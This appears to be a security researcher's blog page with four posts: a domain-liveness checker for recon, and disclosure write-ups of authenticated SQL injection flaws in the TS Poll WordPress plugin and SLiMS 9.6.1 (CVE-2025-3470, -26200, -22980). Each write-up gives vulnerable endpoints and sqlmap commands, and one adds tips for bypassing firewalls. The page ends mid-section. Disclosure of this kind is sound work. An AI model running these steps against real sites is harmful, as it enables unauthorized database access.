Wednesday, April 23, 2025

AzuLive: My First Python Tool to Check Live Domains



Hey Broccolitos!

Just wanna share a small tool that I built, called AzuLive — a Python script that helps you filter which domains are actually live and responding.

Sometimes you’ve got a long list of subdomains or URLs, and you wanna know which ones are active without checking them one by one. That’s where AzuLive comes in.

 What It Does?

AzuLive takes a list of domains and checks them using HTTP requests. If a domain responds with a status code like 200, 301, 302, or any other you specify, it will be saved into an output file. Simple as that!

So, why did I make this?

Well, first, I needed something to quickly filter active subdomains during recon. But also, I wanted to learn how to code. I’m still learning, and honestly… I’m not that good at coding yet :)
The code might look rough or “not perfect,” but trust me, I spent a good amount of time figuring things out, debugging, googling errors, and learning as I went... kkkkk😂

How It Works?

You just run the script like this:

 python azulive.py -l domains.txt -o live.txt

 You can also specify which status codes you want to count as “alive” with the -i flag:

 python azulive.py -l domains.txt -o live.txt -i 200 301 302

 Features

  • Supports custom status codes.Skips invalid, unreachable, or empty lines
  • Handles timeouts without crashing
  • Colorful output in your terminal 🌈
  • Has a funky ASCII art banner 😎

You can get the tools, from here!!!

 Thankyou for reading, hasta luego broccolitos!

Monday, April 14, 2025

TS Poll <= 2.4.6 - Authenticated SQL Injection (CVE-2025-3470)


 

Olá Broccolitos.. I discovered an Authenticated SQL Injection vulnerability in the WordPress plugin TS Poll – Survey, Versus Poll, Image Poll, Video Poll version <= 2.4.6. This vulnerability has been assigned CVE-2025-3470 and is now publicly listed in the Wordfence Intelligence Vulnerability Database.

Vulnerability Details

The vulnerability resides in the s POST parameter in the following endpoint:

/wp-admin/admin.php?page=ts-poll
Due to insufficient input sanitization, an authenticated attacker (Administrator+) can inject arbitrary SQL commands into the query, allowing unauthorized access to database contents.

This issue is exploitable via boolean-based, time-based, and UNION-based SQL injection techniques.

 Proof of Concept:

  1.  Install the plugin and log in as an administrator.
  2.  Go to: wp-admin/admin.php?page=ts-poll
  3.  In the search bar, enter any query and intercept the request using Burp Suite.
  4.  Save the intercepted request to a file.
  5.  Run the following sqlmap command:
    sqlmap -r [requestfile] -p s --random-agent --tamper=space2comment --level 5 --risk 3

           The parameter s is confirmed to be vulnerable.


Plugin developers have patched this issue in version 2.4.7. It is strongly recommended to update to the latest version immediately.

Reference:
Changeset Source Code 

Database Vulnerability

Thats all from me,
Hasta Luego Broccolitos!!!

Saturday, February 22, 2025

Another SQL Injection in SLIMS 9.6.1 (CVE-2025-26200)

Well, hello Broccolitos!

This is my second article about a SLIMS vulnerability that I found in January 2025.

This vulnerability was found in /admin/modules/reporting/customs/visitor_report_day.php at the "month" parameter.

Like similar vulnerabilities, this issue arises due to improper input sanitization. This vulnerability can allow an attacker to gain sensitive information. However, it is only exploitable if the attacker has admin privileges.

Source code


 
You can see that before the vulnerability was patched, the month input was not sanitized.
After the patch, the developer modified the input handling by using an array list to define valid month values (01, 02, ..., 12) and added validation to ensure that the input is valid before processing it.

Step to reproduce:

  1. Intercept the request at vuln endpoint above in, Burp Suite and modify the "month" parameter.
    (In this step, you can inject manualy with time-based blind sqli payload for extract the data, or you can use sqlmap to get simples way. (I preffered to use sqlmap for automation).

  2. Save the http request to a file with notepad.

  3. Run SQLmap using the -r option to pass the saved request file.
    (On a real target, you may use --tamper, --level, --risk, and --random-agent to bypass the firewall. In that case, you must find the best combination of options.)

To patch this CVE, update to the latest version or modify the visitor_report_day.php code as shown in the image above.

This Vulnerability has reported on 6 January. The issue was patched on 7 January. A CVE was reserved on 21 February 2025.

Thats all from me, thankyou for reading my blog. 

Hasta Luego, Broccolitos!!!

Thursday, January 23, 2025

SQL Injection Vulnerability in Senayan SLiMS 9.6.1 Bulian (CVE-2025-22980)

A SQL Injection vulnerability was found in the tempLoanID parameter on the /admin/modules/circulation/loan.php page of the Circulation module. This vulnerability can be exploited by an authenticated admin user to execute arbitrary SQL queries on the backend database, potentially leading to unauthorized access or manipulation of sensitive data. 

The vulnerability was reported on January 8, 2025. The issue was validated and a patch was deployed on the same day. A CVE was reserved on January 22, 2025.

Vulnerable Code:

The tempLoanID parameter is used in a search form. If user input is not properly validated or sanitized, it can lead to SQL Injection.

Details

  • Affected Component: /admin/modules/circulation/loan.php
  • Vulnerable Parameter: tempLoanID
  • Type of Vulnerability: SQL Injection (SQLi) 
  •  Authentication Required: Yes (Admin user)

Steps to Reproduce

  1. Login as an admin user and access the /admin/modules/circulation/loan.php page.
  2. On this page, there is a search field. Enter any text into the search field.
  3. Intercept the request using Burp Suite by enabling the "Intercept" feature.
  4. Save the intercepted request into a file (e.g., tes.txt).
  5. Use sqlmap with the -r option to perform an attack on the intercepted request. For example, run the following command in your terminal:
    sqlmap -r tes.txt --batch --level=5 --risk=3 --dump
  6. Observe the results from sqlmap, which may indicate successful SQL injection and possible exploitation.

 Impact
An attacker with admin privileges can manipulate the backend database, potentially viewing or altering sensitive data and escalating the attack to compromise the system's integrity.

Recommendations